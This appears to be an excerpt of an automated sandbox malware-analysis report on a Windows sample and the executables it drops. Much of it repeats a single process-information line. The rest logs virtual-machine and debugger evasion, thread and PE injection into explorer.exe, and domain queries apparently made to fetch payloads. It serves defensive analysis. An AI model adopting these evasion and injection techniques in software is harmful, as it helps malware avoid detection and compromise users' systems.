                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: fw8ex1BNek.exe, 00000000.00000002.427730534.0000000000827000.00000004.00000001.sdmpBinary or memory string: ASWHOOK
                      Checks if the current machine is a virtual machine (disk enumeration)Show sources
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\acgvitwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\acgvitwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\acgvitwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\acgvitwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\acgvitwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\acgvitwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Windows\explorer.exe TID: 6588Thread sleep count: 565 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 6592Thread sleep count: 233 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 6612Thread sleep count: 370 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 6612Thread sleep time: -37000s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 6700Thread sleep count: 423 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 6776Thread sleep count: 131 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 6688Thread sleep count: 237 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exe TID: 4752Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 565Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 370Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 423Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_052FA538 rdtsc 17_2_052FA538
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: explorer.exe, 00000005.00000000.414901290.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 00000005.00000000.414837754.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
                      Source: DB56.exe, 00000012.00000002.621782230.0000000000FF8000.00000004.00000020.sdmpBinary or memory string: VMware
                      Source: explorer.exe, 00000005.00000000.409676978.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000005.00000000.414837754.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
                      Source: explorer.exe, 00000005.00000000.409676978.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000005.00000000.373755525.000000000461E000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mict
                      Source: explorer.exe, 00000005.00000000.395650395.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
                      Source: DB56.exe, 00000012.00000002.621782230.0000000000FF8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
                      Source: DB56.exe, 00000012.00000002.621782230.0000000000FF8000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware2DTXZL_YWin32_VideoControllerNA9BZMXCVideoController120060621000000.000000-00048390441display.infMSBDA_EF1P2_2PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors5MV_TKNV
                      Source: explorer.exe, 00000005.00000000.395650395.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 00000005.00000000.414901290.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
                      Source: explorer.exe, 00000005.00000000.389556354.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeSystem information queried: ModuleInformationJump to behavior

                      Anti Debugging:

                      barindex
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\acgvitwSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_73781BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,24_2_73781BFF
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_0081A84E push dword ptr fs:[00000030h]0_2_0081A84E
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_007EA33E push dword ptr fs:[00000030h]11_2_007EA33E
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_02869B92 mov eax, dword ptr fs:[00000030h]24_2_02869B92
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_02868F69 mov eax, dword ptr fs:[00000030h]24_2_02868F69
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_028671B0 mov eax, dword ptr fs:[00000030h]24_2_028671B0
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_028689C9 mov eax, dword ptr fs:[00000030h]24_2_028689C9
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\acgvitwProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_052FA538 rdtsc 17_2_052FA538
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_023E0490 LdrInitializeThunk,23_2_023E0490
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_0286A914 RtlAddVectoredExceptionHandler,24_2_0286A914

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeDomain query: www.bastinscustomfab.com
                      Source: C:\Windows\explorer.exeDomain query: rcacademy.at
                      Source: C:\Windows\explorer.exeDomain query: bastinscustomfab.com
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\explorer.exeFile created: 4924.exe.5.drJump to dropped file
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Source: C:\Users\user\AppData\Roaming\acgvitwSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\acgvitwSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeMemory written: C:\Users\user\AppData\Local\Temp\DB56.exe base: 400000 value starts with: 4D5AJump to behavior
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeThread created: C:\Windows\explorer.exe EIP: 2E519C8Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\acgvitwThread created: unknown EIP: 4BB19C8Jump to behavior
                      .NET source code references suspicious native API functionsShow sources
                      Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: DB56.exe.5.dr, redaeHegasseMledoMecivreSmetsyS1587.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 17.2.DB56.exe.aa0000.0.unpack, redaeHegasseMledoMecivreSmetsyS1587.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 17.0.DB56.exe.aa0000.2.unpack, redaeHegasseMledoMecivreSmetsyS1587.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 17.0.DB56.exe.aa0000.3.unpack, redaeHegasseMledoMecivreSmetsyS1587.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 17.0.DB56.exe.aa0000.0.unpack, redaeHegasseMledoMecivreSmetsyS1587.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 17.0.DB56.exe.aa0000.1.unpack, redaeHegasseMledoMecivreSmetsyS1587.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 18.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 18.0.DB56.exe.aa0000.1.unpack, redaeHegasseMledoMecivreSmetsyS1587.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.DB56.exe.aa0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 18.0.DB56.exe.aa0000.13.unpack, redaeHegasseMledoMecivreSmetsyS1587.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.DB56.exe.400000.6.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.DB56.exe.aa0000.3.unpack, redaeHegasseMledoMecivreSmetsyS1587.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 18.2.DB56.exe.aa0000.1.unpack, redaeHegasseMledoMecivreSmetsyS1587.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.2.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 18.0.DB56.exe.aa0000.2.unpack, redaeHegasseMledoMecivreSmetsyS1587.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess created: C:\Users\user\AppData\Local\Temp\DB56.exe C:\Users\user\AppData\Local\Temp\DB56.exeJump to behavior
